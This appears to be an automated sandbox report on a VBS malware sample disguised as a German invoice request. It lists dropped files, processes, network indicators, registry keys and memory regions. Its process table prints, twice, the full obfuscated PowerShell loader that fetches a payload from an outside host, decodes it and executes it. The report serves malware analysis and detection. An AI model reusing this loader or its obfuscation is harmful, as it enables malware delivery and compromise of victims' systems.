Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l30usody.dgt.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qeygavsh.bih.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qltk43lb.rg3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ur1ensrl.2se.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Kinetoplast.Liq
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs"
|
||
C:\Windows\System32\PING.EXE
|
ping gormezl_6777.6777.6777.677e
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrous
Procurer Cantors Emeraldine #>;$Husklike=$Erhvervsaffaldets+$host.UI; function Lymnaeid($Simonize){If ($Husklike) {$Methodisty++;}$Minimumstermometeret=$Knaster+$Simonize.'Length'-$Methodisty;
for( $Pales=4;$Pales -lt $Minimumstermometeret;$Pales+=5){$Postcardinal=$Pales;$Dekompressionen+=$Simonize[$Pales];$underbreeding='Helstegte';}$Dekompressionen;}function
Orfrays($Advolution){ .($Landbetjents) ($Advolution);}$originate=Lymnaeid 'UnsuMAntiokampzBlegi R,nlBerelHobbaCo p/ run ';$originate+=Lymnaeid
'fors5Kjel.Thom0F,rb Nama(KaprW UnfiNo onDueldS,jdolagowMil,sObsc SixpN UndTPoly Skri1 Dyb0rigs.Toko0Scia;Unde BullWUnpri
IndnNont6 Res4Soci;lind AminxBlya6Hngs4met.;rlin CaprfolkvLizz:Egoi1Tand3Fest1Anta. .al0 Fi )Cl.p JogG yrkedecoc.orbkG.aso
fej/ Kir2Skil0erek1 ob0 c,n0Myon1Prod0Ddss1Acqu PumFAt,li .lorIndieHus fDeloo Im,xBena/Tha 1Colo3S ip1Pap . git0 Tre ';$Vgtighedens=Lymnaeid
'Erh.u Bous D fE Currunbl-parka P,pgstate axnBibltFore ';$Adaptively=Lymnaeid ' trh Bist Cont An pFares B,l:Agen/Rund/KvaloDeforC
ratStabhBruloVe biBo,smOutspSolfl.kdea BaanSnontDeckcBuc eSokknVerdt U,eeNondrFire.arkarNldeoTech/CarbBPageeB.rtsSlabtDobbyPolir
HeleUn.etBed,.squaoMirkc Uncximcn ';$Reformbevgelser=Lymnaeid 'Pre,>R,ma ';$Landbetjents=Lymnaeid 'Ma ci,atoE impxS.rv ';$Befolk='lousin';$Vitalizings='\Kinetoplast.Liq';Orfrays
(Lymnaeid 'Patr$BrysgUnpol So OKronB UpsaS iklLulu: icho Pr.dU,naI Sy SAlloEkatarprecELevi=Rede$Do re SalnKlikvChef:lynnAMa
opFluoPS msdKamea,nddtE eraPyro+Foto$ Vr.vNadvI OphT ilmA Letl ,idiSubtzBawdiDy en Re GMilkSBr.t ');Orfrays (Lymnaeid ' S
r$af rg,pspLDr,aOOpfoBCo ca UndlTe r:Hyp.dHun.O,remBUnspbnar ENamel Maht HiehUnchENedsdUpereRabaRFossN LogE a bsSham= r c$Di
kALyttdDrataTiggP DeitTvanIScanVD maeRom L,odsYAnan.MegasTradpb dqlUdgiIune.T J n(Tr a$Srnur eaueAngeF Fo.OGradr VelMEst,b
ileDatav Gu.GRetoEC.njLPhansSjleE Tonr Ecd)G ln ');Orfrays (Lymnaeid ' Svm[HespNEuklE bnetHest.BackSF dsEPolyRVic vConsIKultCEnduE
egiPKonkoGrypiSmaaNAaret RhymKulmAGennnanalA L aGM,skekonfrairm] Lux: D.k:Nonms Di.EOverc OveUDispRCaviIActutJuryyBygnpRin,RGrimoM.eaTOpdaoDuoeCHudiOManiLUn
n Farv=E,te Brug[ UndnTungeRigsTSky .BilcSR goE AttcSw,euKorrrCaphi Kikt andYNavnpBlokREk io Armt AmaoO,nocspoooU,trl Ma.TC
viY.rogPMyste U y]Hal :Chin:AlahtEm,iL EncSDepe1Udda2Az m ');$Adaptively=$Dobbelthedernes[0];$Udbyttebehandling=(Lymnaeid
' Lea$DrilGPneuLHoteOBeneBSem.aNdeslPyic:PuliG kniYDiscM F gNSk mAfamisKvisIThigUD.ntmSimu=BrugnPeleE.aboW imr-UnsooAk ibPoliJ,dpoeTolvCS
riTAgro AsmasSk iYMastsNonotimpeEquo MSu c.antinImprEKabuTPaa,. BygwVandESligBOutpCInd LBoliidiasEGramn AffTBe,i ');Orfrays
($Udbyttebehandling);Orfrays (Lymnaeid 'Vu g$RevoG nimy JagmRykknDiglachrisAktii wrouTra mSa,o.af.eH oopeEnroaOstrd Mone storArtis
cle[Hand$TypeV EksgNsketGrshi Indg AuthUneqekampd K ne lufnPol s Paa]Unma=Helv$ S ro P.erRan iTricgHotei SunnOuttaJerntSkare
ygi ');$Praege=Lymnaeid 'Forl$.denG MeeyChapmBlitns.staoutrsOpdyi SpeuAfblmKoll. RusDIneqoN nfwSupenTaarlKommoteglaPsykd AmeF
Humi Surl EskeS,em(Vesi$ LanAg.itdU koaFortp Ta tSprii C.avState E.tlDopey Klo, Sel$ Ap cad ehConceMatheSusts Ho e Ge mpolio
counPrergTraue SkarPreei KvanAmt,gP ed)Abse ';$cheesemongering=$Odisere;Orfrays (Lymnaeid ' Cen$UnfogS raLReceOPermBcel.aUkvalLevi:
Kd RAa sEs.ollUne,A imltAddiiDansvBrusEUndetLed S Med= ,er( StiTDenoESlagsrootTurte-frigpPhalaWil TOverHglyc Hush$P vecSoveHTrumeManke
iblS TriEPrecm SamO R pn E kgBogsEUngurAdreiTwe nPreigBo t)Sol ');while (!$Relativets) {Orfrays (Lymnaeid ' van$IndsgUndelS,nsoVibrbFolkaPo,yl
A.p:vandSF yvcRakeuWinit,lbaiInkobjupor ffia Joun,mascG nahAllei ForaHead=En o$Tetrt SvorVr guSamkeTamb ') ;Orfrays $Praege;Orfrays
(Lymnaeid ',ondsKorntHjerAwhi R Hidt ara-Ca tSHaevlSaksE,nineJ erpPenn Rot4Tele ');Orfrays (Lymnaeid 'Eksa$SquiG NonlSippO
etbTiliAParilMist:KeyeR enaeTherlOpslaUndet .agi Catv U.meRkketB ags ann=Haan(G osTForrETurbSBlysTIceq- S.mpAfkaAUndetRecaHGirn
Sig$ optCBarbhB ckeCem eSimiSJensEHutcMKjolo Supn,xiogPl dESen.rAnt iBr mNPr fGUn.a)inte ') ;Orfrays (Lymnaeid ' Pro$BestgLugtLPallOPro
BAfteABlokLP rt:StivtTeleOH,veRLotht VarUBlocRgrafR Klbe FlidOvals P,rK,visaStvlBPalmeTrk,RRrgtnRdl eLive= For$ExhiGUnshl
JamONysgBAfdeaUnflLAbst:SuitRInteY s tT BriTIntoEUn ursvarSAbonkJerseArriREmignUd.ae Ove+ .ac+ Ov.%B an$JantDMentOMarcbKameBBl,vE
ModL ProtKhelH Faketrstd None Shyr.einN vinefortSPant.EndecagroOInwrUBra N,nsttAvli ') ;$Adaptively=$Dobbelthedernes[$Torturredskaberne];}$Raatret=335849;$Afft=30088;Orfrays
(Lymnaeid 'Vag.$UdlngFablL P eOTh wbOmniaPerklfeud: ranMU ilIWi tLMetaJ lmobCopuEUdklS .obkLandy FalTTr ntSasheSteml aulsDoorEKontSPreaSSpooeBrneKHypstUlykO
ConrSkri ear,= dou orsGKlimeKultT Eu -PunnCBilaOCo tNIslnTGrovE tarn C,ptskyd Stat$LnfrCTen hDireeAffeEReinsCercE esaMMaleOFluoN
onsGRoseEPlairStavi npaNBenhg Ego ');Orfrays (Lymnaeid 'Peri$Embrg QuilSu.foBallbFod a AdelF rb:HabrV autigebermaniiRekrdLoveiJensgrecoeOpdrnEfteo
Benu GossHors Heli=hous Krop[SionSRepryAlonsErintK,seeD ffmBest.Bes,CCentoEmannVennv skee RecrSpintD.ms] Und:Falc:NummFStasr
Ejeo FalmDvalBproraVedlsAcroeBeed6V by4 ChrSOmskt ForrPolsiFolknOverg Pr (Pels$BedyMDikki F.rl orjFordbBorse IldsDrunkL neyLungt
Sp t FraeVu.glT.ansOmste PresSquosI tre FibkBiblt uloCaderBom ) Zoo ');Orfrays (Lymnaeid ' Kom$ Ba gFleelOrgaO amsbHe,eaDobblDo
n:BagtY isln,eunkDalrSLotho ccoMIfres,erotSve Ktti=,yrr seu[Precs H sYFo ksRistTJunkeAfklmPyro.raasTEftee RegxNedvtShun.
Arme.nfenKatnCkindoMangdLepti k inMariG na]Over:Nonc:KalaAK,glsPimpcAdeaIkermI Lie.RumngF lse M ktAntesBlo,TManirExpoiAlien
E sG Min(Inc $E,epvKolliAngiR ajiAnlgd gneIWilegUddiEHy,eNSi koKommuMi is G a)Verf ');Orfrays (Lymnaeid 'Stro$NonsGBispl
ejogirabPe oaSpisl iml:LangTLam H ForaKardnPrefa .oyTBi loHudaLDarkONoncg ubm=Taal$ReviY adeNPallK Tras G eOS arMForsS Po,TM
rp. scasBesmuUnnaBSkjosEn.iTInterCav.IvrtsNGa.mG Unw(.rev$GymnrSubcAA toAUndeTAstrR Br.eDesutBog ,Inte$MythaForrfAva,Frailt
Vil) Rub ');Orfrays $Thanatolog;"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrous
Procurer Cantors Emeraldine #>;$Husklike=$Erhvervsaffaldets+$host.UI; function Lymnaeid($Simonize){If ($Husklike) {$Methodisty++;}$Minimumstermometeret=$Knaster+$Simonize.'Length'-$Methodisty;
for( $Pales=4;$Pales -lt $Minimumstermometeret;$Pales+=5){$Postcardinal=$Pales;$Dekompressionen+=$Simonize[$Pales];$underbreeding='Helstegte';}$Dekompressionen;}function
Orfrays($Advolution){ .($Landbetjents) ($Advolution);}$originate=Lymnaeid 'UnsuMAntiokampzBlegi R,nlBerelHobbaCo p/ run ';$originate+=Lymnaeid
'fors5Kjel.Thom0F,rb Nama(KaprW UnfiNo onDueldS,jdolagowMil,sObsc SixpN UndTPoly Skri1 Dyb0rigs.Toko0Scia;Unde BullWUnpri
IndnNont6 Res4Soci;lind AminxBlya6Hngs4met.;rlin CaprfolkvLizz:Egoi1Tand3Fest1Anta. .al0 Fi )Cl.p JogG yrkedecoc.orbkG.aso
fej/ Kir2Skil0erek1 ob0 c,n0Myon1Prod0Ddss1Acqu PumFAt,li .lorIndieHus fDeloo Im,xBena/Tha 1Colo3S ip1Pap . git0 Tre ';$Vgtighedens=Lymnaeid
'Erh.u Bous D fE Currunbl-parka P,pgstate axnBibltFore ';$Adaptively=Lymnaeid ' trh Bist Cont An pFares B,l:Agen/Rund/KvaloDeforC
ratStabhBruloVe biBo,smOutspSolfl.kdea BaanSnontDeckcBuc eSokknVerdt U,eeNondrFire.arkarNldeoTech/CarbBPageeB.rtsSlabtDobbyPolir
HeleUn.etBed,.squaoMirkc Uncximcn ';$Reformbevgelser=Lymnaeid 'Pre,>R,ma ';$Landbetjents=Lymnaeid 'Ma ci,atoE impxS.rv ';$Befolk='lousin';$Vitalizings='\Kinetoplast.Liq';Orfrays
(Lymnaeid 'Patr$BrysgUnpol So OKronB UpsaS iklLulu: icho Pr.dU,naI Sy SAlloEkatarprecELevi=Rede$Do re SalnKlikvChef:lynnAMa
opFluoPS msdKamea,nddtE eraPyro+Foto$ Vr.vNadvI OphT ilmA Letl ,idiSubtzBawdiDy en Re GMilkSBr.t ');Orfrays (Lymnaeid ' S
r$af rg,pspLDr,aOOpfoBCo ca UndlTe r:Hyp.dHun.O,remBUnspbnar ENamel Maht HiehUnchENedsdUpereRabaRFossN LogE a bsSham= r c$Di
kALyttdDrataTiggP DeitTvanIScanVD maeRom L,odsYAnan.MegasTradpb dqlUdgiIune.T J n(Tr a$Srnur eaueAngeF Fo.OGradr VelMEst,b
ileDatav Gu.GRetoEC.njLPhansSjleE Tonr Ecd)G ln ');Orfrays (Lymnaeid ' Svm[HespNEuklE bnetHest.BackSF dsEPolyRVic vConsIKultCEnduE
egiPKonkoGrypiSmaaNAaret RhymKulmAGennnanalA L aGM,skekonfrairm] Lux: D.k:Nonms Di.EOverc OveUDispRCaviIActutJuryyBygnpRin,RGrimoM.eaTOpdaoDuoeCHudiOManiLUn
n Farv=E,te Brug[ UndnTungeRigsTSky .BilcSR goE AttcSw,euKorrrCaphi Kikt andYNavnpBlokREk io Armt AmaoO,nocspoooU,trl Ma.TC
viY.rogPMyste U y]Hal :Chin:AlahtEm,iL EncSDepe1Udda2Az m ');$Adaptively=$Dobbelthedernes[0];$Udbyttebehandling=(Lymnaeid
' Lea$DrilGPneuLHoteOBeneBSem.aNdeslPyic:PuliG kniYDiscM F gNSk mAfamisKvisIThigUD.ntmSimu=BrugnPeleE.aboW imr-UnsooAk ibPoliJ,dpoeTolvCS
riTAgro AsmasSk iYMastsNonotimpeEquo MSu c.antinImprEKabuTPaa,. BygwVandESligBOutpCInd LBoliidiasEGramn AffTBe,i ');Orfrays
($Udbyttebehandling);Orfrays (Lymnaeid 'Vu g$RevoG nimy JagmRykknDiglachrisAktii wrouTra mSa,o.af.eH oopeEnroaOstrd Mone storArtis
cle[Hand$TypeV EksgNsketGrshi Indg AuthUneqekampd K ne lufnPol s Paa]Unma=Helv$ S ro P.erRan iTricgHotei SunnOuttaJerntSkare
ygi ');$Praege=Lymnaeid 'Forl$.denG MeeyChapmBlitns.staoutrsOpdyi SpeuAfblmKoll. RusDIneqoN nfwSupenTaarlKommoteglaPsykd AmeF
Humi Surl EskeS,em(Vesi$ LanAg.itdU koaFortp Ta tSprii C.avState E.tlDopey Klo, Sel$ Ap cad ehConceMatheSusts Ho e Ge mpolio
counPrergTraue SkarPreei KvanAmt,gP ed)Abse ';$cheesemongering=$Odisere;Orfrays (Lymnaeid ' Cen$UnfogS raLReceOPermBcel.aUkvalLevi:
Kd RAa sEs.ollUne,A imltAddiiDansvBrusEUndetLed S Med= ,er( StiTDenoESlagsrootTurte-frigpPhalaWil TOverHglyc Hush$P vecSoveHTrumeManke
iblS TriEPrecm SamO R pn E kgBogsEUngurAdreiTwe nPreigBo t)Sol ');while (!$Relativets) {Orfrays (Lymnaeid ' van$IndsgUndelS,nsoVibrbFolkaPo,yl
A.p:vandSF yvcRakeuWinit,lbaiInkobjupor ffia Joun,mascG nahAllei ForaHead=En o$Tetrt SvorVr guSamkeTamb ') ;Orfrays $Praege;Orfrays
(Lymnaeid ',ondsKorntHjerAwhi R Hidt ara-Ca tSHaevlSaksE,nineJ erpPenn Rot4Tele ');Orfrays (Lymnaeid 'Eksa$SquiG NonlSippO
etbTiliAParilMist:KeyeR enaeTherlOpslaUndet .agi Catv U.meRkketB ags ann=Haan(G osTForrETurbSBlysTIceq- S.mpAfkaAUndetRecaHGirn
Sig$ optCBarbhB ckeCem eSimiSJensEHutcMKjolo Supn,xiogPl dESen.rAnt iBr mNPr fGUn.a)inte ') ;Orfrays (Lymnaeid ' Pro$BestgLugtLPallOPro
BAfteABlokLP rt:StivtTeleOH,veRLotht VarUBlocRgrafR Klbe FlidOvals P,rK,visaStvlBPalmeTrk,RRrgtnRdl eLive= For$ExhiGUnshl
JamONysgBAfdeaUnflLAbst:SuitRInteY s tT BriTIntoEUn ursvarSAbonkJerseArriREmignUd.ae Ove+ .ac+ Ov.%B an$JantDMentOMarcbKameBBl,vE
ModL ProtKhelH Faketrstd None Shyr.einN vinefortSPant.EndecagroOInwrUBra N,nsttAvli ') ;$Adaptively=$Dobbelthedernes[$Torturredskaberne];}$Raatret=335849;$Afft=30088;Orfrays
(Lymnaeid 'Vag.$UdlngFablL P eOTh wbOmniaPerklfeud: ranMU ilIWi tLMetaJ lmobCopuEUdklS .obkLandy FalTTr ntSasheSteml aulsDoorEKontSPreaSSpooeBrneKHypstUlykO
ConrSkri ear,= dou orsGKlimeKultT Eu -PunnCBilaOCo tNIslnTGrovE tarn C,ptskyd Stat$LnfrCTen hDireeAffeEReinsCercE esaMMaleOFluoN
onsGRoseEPlairStavi npaNBenhg Ego ');Orfrays (Lymnaeid 'Peri$Embrg QuilSu.foBallbFod a AdelF rb:HabrV autigebermaniiRekrdLoveiJensgrecoeOpdrnEfteo
Benu GossHors Heli=hous Krop[SionSRepryAlonsErintK,seeD ffmBest.Bes,CCentoEmannVennv skee RecrSpintD.ms] Und:Falc:NummFStasr
Ejeo FalmDvalBproraVedlsAcroeBeed6V by4 ChrSOmskt ForrPolsiFolknOverg Pr (Pels$BedyMDikki F.rl orjFordbBorse IldsDrunkL neyLungt
Sp t FraeVu.glT.ansOmste PresSquosI tre FibkBiblt uloCaderBom ) Zoo ');Orfrays (Lymnaeid ' Kom$ Ba gFleelOrgaO amsbHe,eaDobblDo
n:BagtY isln,eunkDalrSLotho ccoMIfres,erotSve Ktti=,yrr seu[Precs H sYFo ksRistTJunkeAfklmPyro.raasTEftee RegxNedvtShun.
Arme.nfenKatnCkindoMangdLepti k inMariG na]Over:Nonc:KalaAK,glsPimpcAdeaIkermI Lie.RumngF lse M ktAntesBlo,TManirExpoiAlien
E sG Min(Inc $E,epvKolliAngiR ajiAnlgd gneIWilegUddiEHy,eNSi koKommuMi is G a)Verf ');Orfrays (Lymnaeid 'Stro$NonsGBispl
ejogirabPe oaSpisl iml:LangTLam H ForaKardnPrefa .oyTBi loHudaLDarkONoncg ubm=Taal$ReviY adeNPallK Tras G eOS arMForsS Po,TM
rp. scasBesmuUnnaBSkjosEn.iTInterCav.IvrtsNGa.mG Unw(.rev$GymnrSubcAA toAUndeTAstrR Br.eDesutBog ,Inte$MythaForrfAva,Frailt
Vil) Rub ');Orfrays $Thanatolog;"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://nuget.org/NuGet.exe
|
unknown
|
||
http://crl.micro
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
https://aka.ms/pscore6lB_q
|
unknown
|
||
https://orthoimplantcenter.ro
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://orthoimplantcenter.ro
|
unknown
|
||
https://orthoimplantcenter.ro/Bestyret.ocx
|
188.241.183.45
|
||
https://aka.ms/pscore68
|
unknown
|
||
http://wicroft.com
|
unknown
|
||
https://orthoimplantcenter.ro/Bestyret.ocxXR1lX
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
There are 8 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
gormezl_6777.6777.6777.677e
|
unknown
|
||
bg.microsoft.map.fastly.net
|
199.232.214.172
|
||
orthoimplantcenter.ro
|
188.241.183.45
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
188.241.183.45
|
orthoimplantcenter.ro
|
Romania
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
5F1A000
|
trusted library allocation
|
page read and write
|
||
95EB000
|
direct allocation
|
page execute and read and write
|
||
1DE999BE000
|
trusted library allocation
|
page read and write
|
||
8A40000
|
direct allocation
|
page execute and read and write
|
||
356B000
|
heap
|
page read and write
|
||
1B470DC3000
|
heap
|
page read and write
|
||
1B834FB000
|
stack
|
page read and write
|
||
1B470C95000
|
heap
|
page read and write
|
||
1B470C72000
|
heap
|
page read and write
|
||
7FFE7E150000
|
trusted library allocation
|
page read and write
|
||
7FFE7E110000
|
trusted library allocation
|
page read and write
|
||
4EC7000
|
trusted library allocation
|
page read and write
|
||
1B470B27000
|
heap
|
page read and write
|
||
1B470C80000
|
heap
|
page read and write
|
||
926FEBE000
|
stack
|
page read and write
|
||
7FFE7DF9C000
|
trusted library allocation
|
page execute and read and write
|
||
8427000
|
stack
|
page read and write
|
||
73C0000
|
heap
|
page read and write
|
||
1DE87F9F000
|
heap
|
page read and write
|
||
73D0000
|
heap
|
page read and write
|
||
1B470C21000
|
heap
|
page read and write
|
||
1B470B43000
|
heap
|
page read and write
|
||
32C0000
|
heap
|
page read and write
|
||
1B827FA000
|
stack
|
page read and write
|
||
7FFE7E250000
|
trusted library allocation
|
page read and write
|
||
1B46EE01000
|
heap
|
page read and write
|
||
1B470CD0000
|
heap
|
page read and write
|
||
1DE897E0000
|
trusted library allocation
|
page read and write
|
||
1DE87E30000
|
heap
|
page read and write
|
||
1B470D71000
|
heap
|
page read and write
|
||
3130000
|
trusted library allocation
|
page read and write
|
||
9410000
|
direct allocation
|
page execute and read and write
|
||
3170000
|
heap
|
page readonly
|
||
3120000
|
trusted library allocation
|
page read and write
|
||
4D60000
|
heap
|
page read and write
|
||
791E000
|
stack
|
page read and write
|
||
8780000
|
trusted library allocation
|
page read and write
|
||
1DEA2092000
|
heap
|
page read and write
|
||
1B46EE35000
|
heap
|
page read and write
|
||
1B470CD8000
|
heap
|
page read and write
|
||
1DE89E43000
|
trusted library allocation
|
page read and write
|
||
7FFE7E230000
|
trusted library allocation
|
page read and write
|
||
1B46EE62000
|
heap
|
page read and write
|
||
1DE89DE9000
|
trusted library allocation
|
page read and write
|
||
3114000
|
trusted library allocation
|
page read and write
|
||
1DE8B6F4000
|
trusted library allocation
|
page read and write
|
||
1B470CD7000
|
heap
|
page read and write
|
||
1DE89951000
|
trusted library allocation
|
page read and write
|
||
1DEA20B6000
|
heap
|
page read and write
|
||
926FF3E000
|
stack
|
page read and write
|
||
8A10000
|
trusted library allocation
|
page read and write
|
||
5F01000
|
trusted library allocation
|
page read and write
|
||
1B82BFE000
|
stack
|
page read and write
|
||
1DE8B6CB000
|
trusted library allocation
|
page read and write
|
||
7FFE7E200000
|
trusted library allocation
|
page read and write
|
||
1DEA213E000
|
heap
|
page read and write
|
||
1DE8A04A000
|
trusted library allocation
|
page read and write
|
||
1B470C57000
|
heap
|
page read and write
|
||
313A000
|
trusted library allocation
|
page execute and read and write
|
||
85A4000
|
heap
|
page read and write
|
||
3100000
|
trusted library allocation
|
page read and write
|
||
1B470B53000
|
heap
|
page read and write
|
||
7FFE7E0C2000
|
trusted library allocation
|
page read and write
|
||
1B470C80000
|
heap
|
page read and write
|
||
1B470CA9000
|
heap
|
page read and write
|
||
1A59FE60000
|
heap
|
page read and write
|
||
1DE87F5A000
|
heap
|
page read and write
|
||
1DEA1E50000
|
heap
|
page read and write
|
||
1B470CDD000
|
heap
|
page read and write
|
||
8A20000
|
trusted library allocation
|
page read and write
|
||
1B470B53000
|
heap
|
page read and write
|
||
8AF0000
|
direct allocation
|
page read and write
|
||
1B470C78000
|
heap
|
page read and write
|
||
7FFE7DF90000
|
trusted library allocation
|
page read and write
|
||
1B82EFF000
|
stack
|
page read and write
|
||
533E000
|
trusted library allocation
|
page read and write
|
||
1B470CA5000
|
heap
|
page read and write
|
||
8560000
|
heap
|
page read and write
|
||
7FFE7E180000
|
trusted library allocation
|
page read and write
|
||
1B470B6F000
|
heap
|
page read and write
|
||
1B470C57000
|
heap
|
page read and write
|
||
7FFE7E220000
|
trusted library allocation
|
page read and write
|
||
7A10000
|
trusted library allocation
|
page read and write
|
||
1DEA2174000
|
heap
|
page read and write
|
||
1B470B3F000
|
heap
|
page read and write
|
||
1DE87F9D000
|
heap
|
page read and write
|
||
1A59FD60000
|
heap
|
page read and write
|
||
1B470DF1000
|
heap
|
page read and write
|
||
1B470C80000
|
heap
|
page read and write
|
||
335F000
|
heap
|
page read and write
|
||
7FFE7E260000
|
trusted library allocation
|
page read and write
|
||
1DE881C5000
|
heap
|
page read and write
|
||
1DEA2068000
|
heap
|
page read and write
|
||
1B470CE3000
|
heap
|
page read and write
|
||
32CC000
|
heap
|
page read and write
|
||
7FFE7E1B0000
|
trusted library allocation
|
page read and write
|
||
3180000
|
heap
|
page read and write
|
||
8A50000
|
trusted library allocation
|
page read and write
|
||
7FFE7E0E0000
|
trusted library allocation
|
page read and write
|
||
1B470C72000
|
heap
|
page read and write
|
||
1B470CF9000
|
heap
|
page read and write
|
||
1DE87F64000
|
heap
|
page read and write
|
||
1B470C95000
|
heap
|
page read and write
|
||
1B470C80000
|
heap
|
page read and write
|
||
1DE99C39000
|
trusted library allocation
|
page read and write
|
||
1B830FC000
|
stack
|
page read and write
|
||
7FFE7E0B0000
|
trusted library allocation
|
page execute and read and write
|
||
8510000
|
trusted library allocation
|
page read and write
|
||
1B470D20000
|
heap
|
page read and write
|
||
9270B0D000
|
stack
|
page read and write
|
||
7FFE7E080000
|
trusted library allocation
|
page read and write
|
||
1B470B4F000
|
heap
|
page read and write
|
||
7FFE7E1F0000
|
trusted library allocation
|
page read and write
|
||
76BF000
|
heap
|
page read and write
|
||
1B470C46000
|
heap
|
page read and write
|
||
8950000
|
heap
|
page read and write
|
||
7FFE7E140000
|
trusted library allocation
|
page read and write
|
||
7980000
|
trusted library allocation
|
page read and write
|
||
1DE8A503000
|
trusted library allocation
|
page read and write
|
||
7FFE7E09A000
|
trusted library allocation
|
page read and write
|
||
7FFE7E091000
|
trusted library allocation
|
page read and write
|
||
1B470B33000
|
heap
|
page read and write
|
||
1DE881A0000
|
heap
|
page readonly
|
||
1B470CDA000
|
heap
|
page read and write
|
||
927003C000
|
stack
|
page read and write
|
||
4D1E000
|
stack
|
page read and write
|
||
8440000
|
trusted library allocation
|
page read and write
|
||
1B470B27000
|
heap
|
page read and write
|
||
7630000
|
heap
|
page read and write
|
||
7A00000
|
trusted library allocation
|
page read and write
|
||
1DE89947000
|
heap
|
page read and write
|
||
7761000
|
heap
|
page read and write
|
||
5F15000
|
trusted library allocation
|
page read and write
|
||
1B470C80000
|
heap
|
page read and write
|
||
1B470C95000
|
heap
|
page read and write
|
||
8A30000
|
trusted library allocation
|
page read and write
|
||
1B470C97000
|
heap
|
page read and write
|
||
1DE87F62000
|
heap
|
page read and write
|
||
1B46EDBC000
|
heap
|
page read and write
|
||
1B470B3A000
|
heap
|
page read and write
|
||
1DEA2064000
|
heap
|
page read and write
|
||
1B46EDFF000
|
heap
|
page read and write
|
||
9270B8B000
|
stack
|
page read and write
|
||
